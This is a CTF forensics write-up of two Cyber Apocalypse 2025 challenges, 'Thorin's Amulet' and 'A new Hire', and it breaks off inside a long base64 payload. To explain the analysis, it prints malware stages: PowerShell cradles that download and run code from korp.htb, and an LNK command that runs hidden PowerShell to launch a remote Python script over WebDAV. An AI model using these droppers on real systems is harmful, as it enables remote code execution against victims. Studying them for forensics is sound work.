Post

Cyber Apocalypse CTF 2025 Tales from Eldoria - Writeups

This is a writeup for all forensics challenges from Cyber Apocalypse CTF 2025 Tales from Eldoria. After a tough battle, L3ak managed to achieve 5th place worldwide! Overall, another great CTF by the Hack the Box crew. The forensics challenges this year were definitely easier compared to previous years, but much more enjoyable and unique.

Thorin’s Amulet [Forensics]

Question: Garrick and Thorin’s visit to Stonehelm took an unexpected turn when Thorin’s old rival, Bron Ironfist, challenged him to a forging contest. In the end Thorin won the contest with a beautifully engineered clockwork amulet but the victory was marred by an intrusion. Saboteurs stole the amulet and left behind some tracks. Because of that it was possible to retrieve the malicious artifact that was used to start the attack. Can you analyze it and reconstruct what happened? Note: make sure that domain korp.htb resolves to your docker instance IP and also consider the assigned port to interact with the service.

Flag: HTB{7h0R1N_H45_4lW4Y5_833n_4N_9r347_1NV3n70r}

We are given a Powershell script and docker instance to investigate. A long base64 string can be obtained from the Powershell script, which seems to be a Powershell command that fetches the content of a file hosted in korp.htb.

1
2
3
4
5
6
7
function qt4PO {
    if ($env:COMPUTERNAME -ne "WORKSTATION-DM-0043") {
        exit
    }
    powershell.exe -NoProfile -NonInteractive -EncodedCommand "SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCJodHRwOi8va29ycC5odGIvdXBkYXRlIik="
}
qt4PO
1
IEX (New-Object Net.WebClient).DownloadString("http://korp.htb/update")

Modifying /etc/hosts/ with the hostname and docker IP, the content of the file can be obtained. The Powershell script seems to be fetching a PowerShell script hosted in korp.htb using a custom request header.

1
2
3
4
5
function aqFVaq {
    Invoke-WebRequest -Uri "http://korp.htb/a541a" -Headers @{"X-ST4G3R-KEY"="5337d322906ff18afedc1edc191d325d"} -Method GET -OutFile a541a.ps1
    powershell.exe -exec Bypass -File "a541a.ps1"
}
aqFVaq

Downloading the PowerShell script with the custom request header, a hex encoded flag can be obtained.

1
2
3
4
$a35 = "4854427b37683052314e5f4834355f346c573459355f3833336e5f344e5f39723334375f314e56336e3730727d"
($a35-split"(..)"|?{$_}|%{[char][convert]::ToInt16($_,16)}) -join ""

# HTB{7h0R1N_H45_4lW4Y5_833n_4N_9r347_1NV3n70r}

A new Hire [Forensics]

Question: The Royal Archives of Eldoria have recovered a mysterious document—an old resume once belonging to Lord Malakar before his fall from grace. At first glance, it appears to be an ordinary record of his achievements as a noble knight, but hidden within the text are secrets that reveal his descent into darkness.

Flag: HTB{4PT_28_4nd_m1cr0s0ft_s34rch=1n1t14l_4cc3s!!}

We are given a EML file and docker instance to investigate. The content of the EML file is as follows:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
Hello Work Team,

I hope this email finds you well. We have received a new application for the open position, and we wanted to bring it to your attention.

The applicant, Lord Malakar, has an extensive background in leadership, strategic planning, and resource management. 
With years of experience commanding large-scale operations, overseeing tactical deployments, and influencing key stakeholders, Malakar believes he would be a strong asset to your organization.

Key Highlights from His Experience:

Strategic Leadership: Spearheaded large-scale initiatives that reshaped industry landscapes.
Crisis Management: Adept at handling high-pressure situations and making decisive calls.
Team Motivation: Known for fostering loyalty and rallying teams toward ambitious goals.
Innovative Thinking: Developed groundbreaking methods to enhance efficiency and control.
We believe Malakar's skills and experience could be a great fit for your team, and he is eager to discuss how he can contribute to [Company Name]'s continued success.

You can review his resume here:
`storage.microsoftcloudservices.com:[PORT]/index.php`

Please let us know if you would like to proceed with the next steps in the hiring process.

Best regards,
Elowan

PS: Make sure you replace the '[PORT]' with your instance's port. Additionally, make sure that any hostnames that are found point to your instance's IP address!

Modifying /etc/hosts/ with the hostname and docker IP, the contents of storage.microsoftcloudservices.com:[PORT]/index.php can be accessed and analyzed. Analyzing the source code, a suspicious JavaScript function can be identified fetching resume files from a specific directory.

eml1

Analyzing the directory, a suspicious LNK file can be seen being hosted in the website.

eml2

Downloading and analyzing the LNK file, the malicious base64 string can be identified.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
└─$ exiftool Resume.lnk
ExifTool Version Number         : 13.10
File Name                       : Resume.lnk
Directory                       : .
File Size                       : 1370 bytes
File Modification Date/Time     : 2025:03:22 11:10:11+08:00
File Access Date/Time           : 2025:03:22 11:10:15+08:00
File Inode Change Date/Time     : 2025:03:22 11:10:11+08:00
File Permissions                : -rw-r--r--
File Type                       : LNK
File Type Extension             : lnk
MIME Type                       : application/octet-stream
Flags                           : IDList, WorkingDir, CommandArgs
File Attributes                 : (none)
Create Date                     : 2025:03:22 11:04:58+08:00
Access Date                     : 2025:03:22 11:04:58+08:00
Modify Date                     : 2025:03:22 11:04:58+08:00
Target File Size                : 0
Icon Index                      : (none)
Run Window                      : Show Minimized No Activate
Hot Key                         : (none)
Target File DOS Name            : cmd.exe
Working Directory               : C:\Windows\System32\
Command Line Arguments          : /c powershell.exe -W Hidden -nop -ep bypass -NoExit -E WwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgB0ACgAJwBtAHMAZQBkAGcAZQAnACwAIAAnAGgAdAB0AHAAOgAvAC8AcwB0AG8AcgBhAGcAZQAuAG0AaQBjAHIAbwBzAG8AZgB0AGMAbABvAHUAZABzAGUAcgB2AGkAYwBlAHMALgBjAG8AbQA6ADQANgAwADgANwAvADMAZgBlADEANgA5ADAAZAA5ADUANQBlADgAZgBkADIAYQAwAGIAMgA4ADIANQAwADEANQA3ADAAZQAxAGYANAAvAHIAZQBzAHUAbQBlAHMAUwAvAHIAZQBzAHUAbQBlAF8AbwBmAGYAaQBjAGkAYQBsAC4AcABkAGYAJwApADsAXABcAHMAdABvAHIAYQBnAGUALgBtAGkAYwByAG8AcwBvAGYAdABjAGwAbwB1AGQAcwBlAHIAdgBpAGMAZQBzAC4AYwBvAG0AQAA0ADYAMAA4ADcAXAAzAGYAZQAxADYAOQAwAGQAOQA1ADUAZQA4AGYAZAAyAGEAMABiADIAOAAyADUAMAAxADUANwAwAGUAMQBmADQAXABwAHkAdABoAG8AbgAzADEAMgBcAHAAeQB0AGgAbwBuAC4AZQB4AGUAIABcAFwAcwB0AG8AcgBhAGcAZQAuAG0AaQBjAHIAbwBzAG8AZgB0AGMAbABvAHUAZABzAGUAcgB2AGkAYwBlAHMALgBjAG8AbQBAADQANgAwADgANwBcADMAZgBlADEANgA5ADAAZAA5ADUANQBlADgAZgBkADIAYQAwAGIAMgA4ADIANQAwADEANQA3ADAAZQAxAGYANABcAGMAbwBuAGYAaQBnAHMAXABjAGwAaQBlAG4AdAAuAHAAeQA=

Decoding the base64 string, the malicious payload can be identified. It seems to execute a Python script after fetching the resume file from another directory.

1
[System.Diagnostics.Process]::Start('msedge', 'http://storage.microsoftcloudservices.com:46087/3fe1690d955e8fd2a0b282501570e1f4/resumesS/resume_official.pdf');\\storage.microsoftcloudservices.com@46087\3fe1690d955e8fd2a0b282501570e1f4\python312\python.exe \\storage.microsoftcloudservices.com@46087\3fe1690d955e8fd2a0b282501570e1f4\configs\client.py

Downloading and analyzing the Python file, the base64 encoded flag can be obtained from the key value.

1
2
3
4
5
6
7
8
9
10
import base64

key = base64.decode("SFRCezRQVF8yOF80bmRfbTFjcjBzMGZ0X3MzNHJjaD0xbjF0MTRsXzRjYzNzISF9Cg==")
# HTB{4PT_28_4nd_m1cr0s0ft_s34rch=1n1t14l_4cc3s!!}

data = base64.b64decode("c97FeXRj6jeG5P74ANItMBNAPIlhyeTnf9gguC3OwmDQHdacg769YdefatM+YvUK3z+M9JaP8O/qb6vH0KF6rVk2laue3s5+rZOq4fl0kOKrJ3KRxHbjcudrMQf2tBc7iukHq/GD7RcSx1tzjdgLirUFk1RX8lk4wi6JDZ/c6dmnzqwE7wWUfMCf2XG3KpOUVXRpM6dktVYtkhr5pfp20Fl0/GYIAne+X9LB6eXd7Y8A69UH4KOFpNAVR0Hs5k0CqeBroaZKrBi3zQGWwEoT59FquZYO2AT8H8Vz/MHrrlYHAydkBHIVhIcOe6slnb/apV4rgVMfPVoNkoutMj5GlrqCBytVghU0ydAG9vX9F/IuwH5D+Nc9lg9+2jthz8u8qS3/T62Y5a0lBSODzvQJ9IuHvo+oh+8EQV/WciLiD+gp9snIxiUwjXpqi8CxReNwFgPUmwiBZe3pEE388OLSJopkdZpCQ3yGXq85ugUz9YOxltcywotisRfG6qMpWttSTN0BrIit7TjjLP7rB/8mBBwmpdbVD8v53QHhnsIWXDVCcvU6QhOcy5poFfSxWZbbF7DfTzt3G+9zGL8HZrRn0aVzCYQrezLaYg4YQbMJk9JO6vzoAIJNXo9bj4DQpLbuHAzp2hspJB0GKwWOjEwXTMgZQP3QCTivTajT1X9nkhMROWlr6ShNSeN7GcxRCqdJ9DIbIt82BjEl7tujm9a85E9OWDL2hLMfJpanPTg6Dty48UCkErR7+lYeG/bnFfB1qU3kUnBAu8+bY4Q2NGkegUa+sAURlMb8LkmQZkaC7nEytlwSEFKrb8V4/sEO6i5iW9XpCTLQjhRpDAD8SwV2q2rhHXBBeQT9mpicZm86LlGvZ80auT6fFvUUU+EGke+RPZnIll6tHds37bRGqTmrwVZekaEgqDqvVrgCpzdbgRVsO6ir6xBZFuGy8ehtzNGWsPmOrRO8dpKhtpxPsXivfz+bVbIZB9R+27bb17H+zEEfJqo2mr3kNUjY5dZj5UEYEUglZfykR6ST47kRcyRO3FHheDVJvEM/KiDk7sdCO9UgH0DDDV1Cu5O+lZ5MpDq/QaoLJ9UriW1vpKm0RY7F+3sAygXECoc8FKL8HzzBARz7wrOyEG9KYIVBtxFg9RNWBtqsMABHclf86z6tdDsqgaaYdP/9Z7MKHLs6cGQRyI2wzvdMbKeBbJF1K3xlHu/i/Qb/nmcu6I9JRY80cAuZuKT1EBEvofjyYOdM3a5VP7GJ1Hj/L0FH3U1NOhs03vzuV2gG9AYyzSLGhXUt1YGQSYqlKzUimUIQ770RrFeXDQfg6JdNInnRM7pFvZethD6lVgxp1r/lonVGhPSnJ2LpUJNnjbEvDLUwU4w3IFw+ggjE3ca469KlxMwG6bUT1LNOsz2oAaa8HrQ7P64ochXjfWhWos6CSvvwo1y354PTvVmV3bBwNLh35AI69DBid1jd+7r8zSyXIQUqVYAjM72WP72xBCnz10CxVVltCWMHhShA/wrRPYaEtzf0dqxEudFpmbbLqvflqDoB1rQp/CDg7nyqf871DaEzeXgzC1ymxtZWUYHpZFsAVW7LmxAs2gNAart6bBYxd3EeG4eETlO/j3ERO/im3Zn1oyXXGI8Vk20jPsYQkZ7C/xx5JSeUjQHko0OrY7wMBP+MlbNGV0SoEqUGDK8M/+quWHAgDR4dPk4HEwn+toD7kUUgDc6RhYd6IweUsBrpfZ4unJlojZUHCMdMA8nBFD0bC/ZIrvino5EnX5OLvRm6fQTtR/Pu4yXqIg2bvKxstIZKZfkrhvA2jtHerLX0bPjlHnIvIbQT6y3R/wwQoGS6WD9HRcseE1cHzhUqhC9NZyHdV5rTbaQCU27XtQA0+uUp1Jgic1LX/y1m1rd2Y913q9H1WuHFkYT6rwydqN2FMtHLsjJ1JbdkSp3h13u9U5EBxpaLjj42RDQmqK/awLBm2JXaa86yaRGFOJo2PafmIhNtHon8yjwKbhCQWsxfYbQIWpEabo0ZcB7ZcY1lyNG7mR3HrIzpcKywCQr+KgmjT9mNBsjRM1qASNRRrZe7Sv1qG0TxiFCq2iXgCp5pZG6IG2lCwFbZKhLHmoQOo7iRMeoF72Gkf4znBXtYT206AGES7SCXZo9v1przgqHW8cRUbpmzlkKnLlyoICtQcaF7rtHY6GP4WbdauULpyN/iwlB5e9L1odOQMQkZEfpo+Zk31wQTbzBbdT778I9vNhs7R1yX1C4Bl0Qa2jMgU4ewelfc24Fw92C4ujRx8b1D6ANoXnxQZ2mg5cb4mLJRdaqmfU7gFj+w6oCTNJE7LPTHBthIYy0Bn7ny4pm75kVLNKoWErloiD29SLYXo4o+OviuonWAJGjn0JoWZ+axd5c7rBj77Cpk3v7LGJmTG0cX6/kBIous0SaZcqoLtERJRlLKKKiQLx5mKkrej3egQCO3ITNzFqQQOT67kMSvXgUFqsKgodZRhUaO94LDuHvpxZ697UBJp8ZdYjFs186UrT166cohhWBaeJud/IynSkVYrX2OaHubDlf74sR5ZUCNTRiWSviO8eCschj5TTCT0SAJWpH+I9ecZNu1XHqZat3sO6+BTJBLDb5v02lpP/PrPzNbUwLXegEjBoRwSw0d4DgGsuCbFHLXIYdsPo5Klc+C47DxuMyaAigHrIE6no5FYy2ii43RHc7gpPweS6j4+6XZjlMgEvcDrK8j7QKlCeYonoGKxG/kPDcwMB7UtohHR9QyrixEaTzmkRoG58BL0+A9zFNMkytHb7KA1o+36fI+svsYAmtEbwOsXrYykHehmMaorVgmlXE1BA1SiH7GbQyl+fIcC81w4Fot6WHVbGbBg0niIZJTSsLTifmpDz45yLBhQ3n8u4JgrZyoq1k/NM3wdROgwyFjXXzdaga0pgcvbsr+viHMLAUSj0QAhjI73JAxaWB8WPb8iWGGpL+Abk6Q0BHpfIo/kXJXgepG1ti496onHCcoYNLVURr8CZvFOeb/bhyG1mp92vewyJUWBa/O5dQ6VpRfH+y0cxSvoLnEpeljCJ4ccMuu3IYwhMQ0XS26QpjzWyGKbVdaKcvDmGClem8LKliKJMfWmM3r9hJbui6ftrJGnJ2xqaOKtKiPnPKofEMhbe6SlAxrpUEuOcerJ/aHxbuZtFb1DYfQr+G121l9o+M9JYg4K9ef6kHpwpysGKjNPS+QNA21hUs+47nJTuihj9ypkIn0VmFNCZCnkcsT3t/uRGJVTwcaWh3MvZOU5ipXpxVew37J5FyCDZ/HDslBliBDtxNIrwdne1/xsAEvYmsgVRSlRmAuQYqvzfJjceuoPWS6BiUVwpksHjBZveow51K0KTncQFFgxc4Iw6tOyZe3l4PTvC89TEtcPB73k4EAlS4vlnk0za5hACOML0zuDy8At6P4T6hehdyaJKCr1w045w81TnBxoGcs8yhBwDq4RuNbFz9MajhxeLde9i/yZOhy1cihXxoJioBZ9lkPnFUVGk64qiOafzZthjWlqaLsNPjU3QSObHHaL8wgGUch3KQKZUWE1Ugt1kguMZGXjkME3uYYksrmGXAAz/S2rxhn1T7BwuxsyBoCPLX8QsV8lfsTBIUsSfWeohkOZElTdb0L/jQMlX9eqw2sigHdXp3fv6LVxRGJZ5NE1LRlsj+YpLIs1KOSg2/g9RiBBlFkuaac2MQv8JSwxFIgctder5dYzZULbixYEDI/lMaQqtj7d5/0GFpsDgStigzQD2oVXwY7MNdxK36TXVb/P3AIOASEog42LnQOcNbBYqwEE2naHx0p8ZOxTUbvP0b0PH4L4K9uGTlTmt66NHQfBaTERUcb5lWdRkxZNiqiV7kyg93Sikr71Y1i72VGjtt9HzQ1+S6qhQ5TQf+qfrWMuQN+bQKs96yf4EW1vwlUQUPftpxN9TxZ4z7FoJQGiFi1zak7uVjDF/MpUo0mVtk6KZFPRC1CERDMOQSL9IzvDhvJugRk9yQd1hOSpdxKfDomSMrJLC00L0x/hwv5XkCAEdoTD21pRuu0kJUavJOWUzX5+02r2loYYMnhR8NfhDmKUgZZAf4rCRfDCSUWfEzz6gcgQiAMJkrRRddmhnITgcAjChzVpPMUkXJFMqHA7NbFHVo7bZo3nEqhvzkrNaw0GFmmesZEip2wroL5Z5hkigP0YV2qAiYdEYL6PmNLcEVwfTfOPhr2E3m9MGisaM8LfuSk622TGmSt0yF2c69DDtOdZ0ThDyReCifqVT1hqS/gPyVx8l7zXU8MvEIrrkpWoQ/BaHbSx/gi1HuwBAiGv5LzAwfvX4WsysgyQgzYZxM7al3ZN+5mEZBXXCO06gwTKDXS1zFCdqSX0J/RQuvSA60enVDmo06tj75TFOSzg41SrkDq4yPeQ77wM0iI2KnsHXaBm3HwIjuqucDNXZpThFsEB0vUzj5d6BIW9XmnkT9DTFMysdx0J8l/2uvtHQSDmoA0O5av++jrF2dR6Z0PvnU7AsRnV+phgsuFFg29oU+dHi21flUhGbh4K4f9rQ4qT4gRHYP0p0+Lm+ViFNcpc4phxTw2ZrsCDQDjZl8g4+sSCIFDnt7Ee0ozJENyRhdUrEtsop/UMhYE4Q3PQIh1NDW+hSyqIZxuhmmgIBHukRyBiMvTFYq9Tb2ACwPEmAPkcHIVGWI3FH34Fsp1lHLtcootc1WxZc6dhINPLCDeAmYoaymRa2ycOSL7NLhqdQxjvZYILQeUk2G265nhmYS6+mDAVENIWRWkl2keKcq12MT4mMw/GQdLG/sA008TitsSH3+YcA+HZggCK/yQOP41mc6Uih2GO4ITBAIqsP0t5QWFHuAKksO3q3QZ9V7JtAb0G2JUpYPWUnyF2wNvjIc/CrfnjgUEPUhSJgSq0A8jAfFkGBkpcinnpRRKjhCZgqZyRz1nJFHPIOlxp17xGi4d3QCLspVqCeXhO1aUgstfPxmKBrAq28d1rKUZlVS9fEsG9HOGhyyxLArajaPzP4cNjLNCiXkpfkkX/AKE8KAG+O7CmwkfdD/9AZmCYVAXI/fO/3A+PenRWs/SFlh7u8Q/Z08DyROjXJULGDl5pCzyrslC7xZ05gCp0WcvvJFGXlaTrZUZDhIhYytQ1BrjY1JlYeiBxA1/6nVCXffpL4+f8L1JoiDYSXlLVWU3fXPvDwb49YD3G4OzNSfpU5mCNq500RK6DAFeHKxgqUatGXle67SZKAWMnE07DNAqy+sO6Xu8VSkrJ8+doC4UsAW6QgkKhAvWGVyFE5r93d3fzW57sAHLH3A3TQts2xhNDn0fOQm1alzhcRH3RsEjGI/MWWX/3gRBBy8huWx2RJQu9ATUWMGCui/pgBe0aZebLTc5cSwHFxSmVCAatdxSoklHz3Fk5fxDcDuPwVMBl8CSY7BJT2+URVWRGAFVasVtFW8B5ypGwacsUir0wjgBrhBK5G9BJybHD1rne/rC5TjNm2xl0hchy6IgnRKDHEcl79VGNB1C0L7LjdqFHK31N6xToiYskAhcxqG/Bo2hgDOghejpFQTdh+EeDEBhLwpTjYW8BWxUbL9+I8f9M8D3kEoH2xLay/hvHer+I5Kp01JcZ750N/KNukzupahfX8u0Gt3wJZoMfGPAezcpIoH+vEP+EXyIlmX/JsKwZKYd314N8OfOopbDOF+mG/BHL/0Duh1xhyB2ihOdmKniSsxhIp8IBg+7oEwPfK9jhEgiStgkbs2ftakYMoWCLIhcCo5xEkuFR3Trauy8Ntu3NUdwRTeP8RBum+PQt15CB1Ys1dQsIMwvjBnqBfNYb9yBHUmSlI9x6wM3wEbI6TYn8qJKLvfDq93hhXM/xEfp61FWeZIYT4jBhX8xs1BxVTyT+HUp+q4/+/jbymbrwzO/TNls8iFk7eNsXn83zp6V2yojizmUUBYwQcJkkbSBg+t4kCM+BWA1kLJ4eu4tYxuEfq8suBa4BODJEZHpQYRJrmXZLOZ1EMELclDUXjTQxvdaWGsl92yFjW1+p0HpLzl9BQJtOSBndMTDGzh4qLpqYK+R7CyKwxnXfWGinyoCmJCtBd9zUA11fKr5Szt1ZuN5HhSD2/6BkO9YDeVGE3vigOJxjDPxv0yMlF5mIAVLAtrltNvxOboAyHsHykshAhstWl0rK6cIQra486RdBmD9xfljwYa8SEl3wIVTOR22CECSOn/vniJNJDx9GD+9IM50pTY7qlRLPDCn1DhZg1zwAQioia35i4nWj0H6TCXeB9jbxvOCF7rB8f31WagsCICOgOgKEBUhf48x7CHItLkuhBPgBixmO/JulXtskQVkXrEiQGRTB40h1LBuHIJA0e8JgzGINewNe3fKVCWbof0r4CbGUDtorvzytZ6VgbIf8+msRQQZLNfalgn/s8c+6FFzTNmVWeJCNXTkYRFKEHPbqc5Ald32C4lIPPcdGjyZThW8IcT3obQpW15KpDB55owSDBxHVyLyDsJDmDS8cQJFcE8pKAdcel+ZRd/0F7MwDS1/1J33ZwKUAx4S8RFhwcHni5uxg02/AJcubfMOnPe8s72uz87ZsIYIRl6lUtBurHB2Kj6f/QhwHL+KXrxnLowSL81yeP+93mTh+antGKWHxFtL5O+20YkTTDzbjA2e7swDYDLsDyBbvE69XIIxIEedvwnUjDFLBWgjHIQi51pIA0RsbGz8ATzoFQYjE6+fUe09gByka3yrKYONbdx/EvP9ukwgjqyPDYEpNtGaSs4W3CgsE2HyCLbKgSHEM/XiIm2OilHxaXpJFrQMIYUiYEqRg7YJpQrmg3fMOR0ZbEMDVQd/vwCl4ksEs/JktVoKTmAOPTKXC5W6UIfNx3aOvYpJkcR8yCQzGK+EAhrMFUtuddZqMcTRhRsAa8A7IS6w4DHdlHY/uI9O2FYTK8f//JRgndUhDZohStqI3DEKFRrkZipv8DQ/iPkF2CBF1of+ZxI755/uLrZv+BNiQH8FvFAfqYmKl7EO3DWeUigcRUoCvrnRYL39AeFiSlVKCA0A0JN212FBa45JiYX3HgAsog/UJy/4dGzLOL0fQ8KEFE/WLRBRh0gCwNPQHz2h/6Br/C/TJCqaLKepdo4G3aUu2vgRoDNA9KUiZmLQNykjBry4WTl4cZ4LO6eF9s4PmWNL9O7K9zYciZhawt8DLUYoMBy9/sd4BEfx8Pqxtpy8FnbGd7U82UDpordeRsTp6eH2NHmNYhWfSqYssveqY+LrWdR9/dGy+xzY4hYngPYCUGv9X702cLMIzfxe8rvDn8roB453AJy8iFWa5WrF1GSPmQpUnzJ5l8P7yczgbU/CrEubm93qNaeMNSZmQrbvLldzX1k8Laqi2ACCOSs0jUldhEXP8Q7G4u53fNYgVa9iQPZD4Bgdfl43DTYR5avN5BL+1UJzHvFLtPlpXRj9kkm9N2OCNcwuBoCpxUEp0FbHMZMDSKvUTJobgwZeDyl2lJUn8B2TgwgQ16fWTukFPDCuDCjYaWhBUDVm4aYjTWsFd2/Ph48lvXw0+9s7yzE9/La59jMlbJLGoTLfpDoFIHUdXYaTzZ2HaP8vwA24Br97GRLR6lc/+x7VrK32hRGo7/Ah1HYJFxpQS4Mes4nDnMn+khU6l4G/jHG08lpq9tBU4cJoOG72vYsIEUOyRCtIfs5qjqsPo4f0t76FPn8DeXnGPk47hgukRMgd9BP5YKkGoV9RcPjgYNXkKwQ7WZaHBxn1gaGuAFIbcaiCb6kBCeknykoENM5R+SNMkc1vHpEEJGhANpKucEho7AcWGJgvvZMtUpUHd7I6ikwgwscQR/dBr8oRxTw6pZL/GOptkJQR60kl5u+zsRgY386xJvtnY+54Qfzx0rXkyZeLENpRtJAe1stOc+w/67mUB+tXkbNVu+MVSH86WJbT3IgBHhxABVxp7JQGYYNizB7bQt32WUVpjCUaDt4D2411XjoqMGNldFxlvRHHGZz4ZIZLa14Ivt0LSY4qQzbRNtUIb5PpYZht5Ug9NeyK/4HiuHkwyU+4Sclu9GqsV2K7PDDnCMQsFMjhSpPVavZqk0duJzyZZPJrYSoNzfBiotLC8mc/iXMQmDcfQixJHGruh36+UP8UIiHbJSnSCPc/vQ1fU/DA1DOyvVS+j3RWoVYwhU3igDc3LsYdO3eBDbGlj2ChOBSFY+vObCacBIwJxUXWUvGA0nWJRmRIcoSXkwAcMic0VUV2a4joS7ucHHaaT86a3l8R55Cj64cKRfI3yfOSXGEis7GI+1kePbq20qiEjB+ly6w+ZVtG3AXQbQQnCruHabovJ8TgaQzYuoMbYJlJjjY8sf2brkeorxtq9vaC3Zgt9SV8fvQ6A20XJJ7s4wCoO2kZDJsclP/gwqVO6UCDiNnhNwahvzkHoAMXgn4EU5qzy5WHIqvvrmCx9eiVN7FwXHJKXRWMl8eMQiciVFWl24vrTpyParQIqlXNo0gNrjXZhqNaEcVXuvfBsOxVOBf3HA34dp2MABoKhcZWLy3kizcsmn7i1A4ZTi4fKXb4BA1ulZGDgNGpSt5lUYEEolbLWrt/GFD9sdupj57FdQqrFYpL6Hwo62sHp8eOJBLqM4PtHJVkHO3u2KXwolexxQkJJcZcA+VbyGhH49cYkyBtDh6SSR4E1hhqnpEohW0Um6GiysmhHDqKnSQB+zGI09s0Jki+grsv/Qgta07xATNtCC7E4zC35A9+Yy2zozRPOTsd1HW4Xs02TxVGJdJi5C52dZtD+xJfzJJpUwn22alKvRX43BcWgZTDFhlVTord0ykDrfEcl0NhlxtOoj2GqZZJedrBLLx/q94Wt7nsDEMMf+81D1pRcJ0upjNzTXiaHWyd1UUNlm73cSaJQdf8+BMMKjV+TMzp62fGNVysXBiReOOuaZw808eFlsjTuJXU9oMYIqx+Ue3qn71lMBlhZMYso8UadM68GZlOKUgFkmdmv7U7ATikXwJi/dqrDgxEd/HjUez+N1sBJl5qgcOJC8KlJKV69CqNLXZgrBd2csIV1j8ybUfUi8cT5bSGLoV4xEEPt6OToY1uNagDaaiAR0N4KIvRWmXRnZfEEpyYaO/85GtVeysWAwNBXaWgWc9pCu/V6USNCiTBkiL4uCnmOxYyr+DESIxkHshOA1PRBUn35Z0EinVLa+pMYWs7z+7V2PxPElpUJ3RIZcUcOT4Dhwkn6awuKMu8ZeCiOVqzojk3mtBB9NtLZq3ozUJPb2+6nR5WuvVa/xHoaeo6I44wAXD/W7nxWC9nCPi4S3v8IfJmgYS6MI+yhmr3iCvvAkfCMfwzsx9Zh+fjCYSp512oOYgY9B3TrR7pxKMvAOTP9wNG2W6V8H43utqu56QjiHOWIgnVmnUpDH8KFL/YARuv49oKyfIidOIHiVWFPo5odOCdoQBFu1jhDT3NctRRaFvbPWze1vPIVC/1wxLtmXGJBOuDag14lyYkc8SmTd3shq+gGYOWYx1V8NyhrnaAOzQUgHrhDmaWmwB+p6ymSPY2UgQhiVIrgcLGMuJap/7Zlkhmtnxm3rHq9q0oPt+FTu9b+YrNcjKqqbBzJBavCTatcuO2A/Ak9feZk8iuKocKTprO8R5TlNPybuF95iOQwNMd7VpFE0QO4pMgro9/jyqoRv3YUd9BRqmZRIL3uSMSFcha5KJekdg69PLK7gw75FTrkeFHKD9eEJmlHhf2YzzNFAZtNwrlJ/Q7TWyzIMHkiyw2smhaym0no/1tpYlsycVHYudcgMOwUat/5M7y6c0/1lui0lwVLCaApbbOmoivrHhTCJZ0Y+NQXRzk7CzUekbgSO341uJh5ZCTM4IgsyA1GXBPeIqnEnQ/Na0foQQBSTBESlwE1ZMHNQ32E8s05MGkjmChoyKn57mOcklY7hJkzr1lrF4osp1q2oWGz+qTZutNiJ01pIwTDQ3EKwv+HQ7shVwc6dEdBkPC3cf3KFbnevhCJTpq5CMgbAfxffJY/Y/TePmsE41kBgutIEka5LDwrNFa4ivhyzehe1OdMpXuWWCGsLmwVSfqxICu4fGddKUlj1SxvthB437Xd2oOS4huf+ayokopFHl1ILMtB5e9nmmOriKWTYZ2VjBYnObZAwLH9rqApU/PIwAORLd+Zgr5xKrD709vjpdvc8J6cDnFPs7pg9O99jneA7EG83TU+/keFap0lIhQxq2T4WHcAFHDDKc8CkLzUl3pE76lTfMSkiNDZQMF5yIFYpt6BF7r9RMKKuhvjbtOdh1bPPf3zkVRJqf43URahX/dJHPZiYYdiQCjRMbLy/cvfl1CbodJ1L4HgL/AB2wibMArQ89YBMWoymDBJzBiumG5sK11/QRreerEWH5Xj9YMrp1i96+fV2ND3O6HQ4V5tY025hYEWTLdko03bYVwSRMrpwWeYIsv82SD22Bdtq1pA92HuiGyg5UoMI9hgjGE9EKgsnOrf3VAPUiuQ7MZBv3VC8JbeNWMjgaMMEK7CKyQCYuQWIWr8q//SbIKbDbxxtafzf+ai0GJHigjdtkq3zmm282JXRkZfQkqZ1vLC+O8AbQX/IekXVchJRC5hAIgpydfXXGW1DuB8ZF5AW2uINzzXcm5MN6R4UtfZsly3HjfW4XLKRsItReXJwPuv5w7rToOufIw1Yk6SlMb5B3HhzImmVgk13wLBcnI6VwLBeBav30Gda56PA5DrBw1tOYIvyqhZWFJWhNKv8Ktxg6ZIjEcN/PTnrlyq8qh24Bvr3Kf/BQYXzzPdhMTBD2jHZfJXQdBig4rYv3aG4oKHuhMYk6d4EUnwShY13C/n9bNwKQM/0yLPRiO7l4298kIWWWr/k5mj48lj4gD+sGG3FhlQlrBYuxmCZcWxFnWODiQSDI8RysXMO1Y/+psCA5bYHN/vLj2NMgypmC6aNqi5DI/CP21foiNfxaS0gdoZepFMt9WFlwKKyKlsrVW6nsGD5GxyC989kjCSqteUQLqz7/ryTduiqT9k5HprugnY9ACSFg21pTuUyOt29NL4XfSwYLDrMnHBjkSoj3wV3574qm4kCrAJA445JgMCFik2GYQVCgHpcE1T+XChCvHT9Ha4ToaABGN1rjZ1aJRo621KI/NwbKRu+UBDN4tXVzp5sS3LIMh1XvhnRRSdGlQSZGr+5t7hGnkg+rjJV4c+3PwyJFIyLuQrBOUHxtNokj+x1w5KqvMxT44to8Mfkk4kR8ujTkQGyyEGQHJRpDIM687dx0eoFSUf9oI9JtDcq3I6VwsBC3y26QDS8z51HOySq1+pQxP3u0lRc6GB7jtAhwfX7U9jjsANMcemmc0gVr/wQjb8fPtJlUR5ug8yBYeP1tFrPq35FK5YyHmc72Zxq2gXWXoEKGKRxKocSyfjq64hAXBjLBgR2cpFY1e8MxoDBc+6FlzK2TiKV32ILdEjficzSHu0STX6GNYnDgOXDKIJfx4+8Q7TpnQC9s6BkLHoUsWA2YGfHpM5A8OFkYw46xgOmzIM9290TTuohZgybRpMy+lG7Hbma337PjhCmSyWBExCai0IjeB6B9p/1+droJ2Rfgb0E6nJgb+lUSjRQeH1y7OFR95FJPl7bLwOBUweL4NyXJ2UpHVFeKCzFrgU9kvFDNwZSUdkj5O2Txrjj+CR2FkzT4alvqHvN7pmCu8Azg2h8WCwV3CC51j0iR0RAKpDZxhv+wXyak5kHsR37U5ysGAQTVOarX0RXBZwb2hrGvQke+tPR9CmbQ8QHIXN0XQgC/wOJq/dUUOUCkMUOEhFirQKY97ntdApa9FJFgMI0ZxIk4fTpD6u2JWNSwgc7YKMKOl5x6YRxUfSBEfWqYkmWd7EgEF9unxfhUwGP2cB4ZIJYeBBYfHwClnSmsYXhr16OknoxdnIHTdNT/xx6D0MHJ1L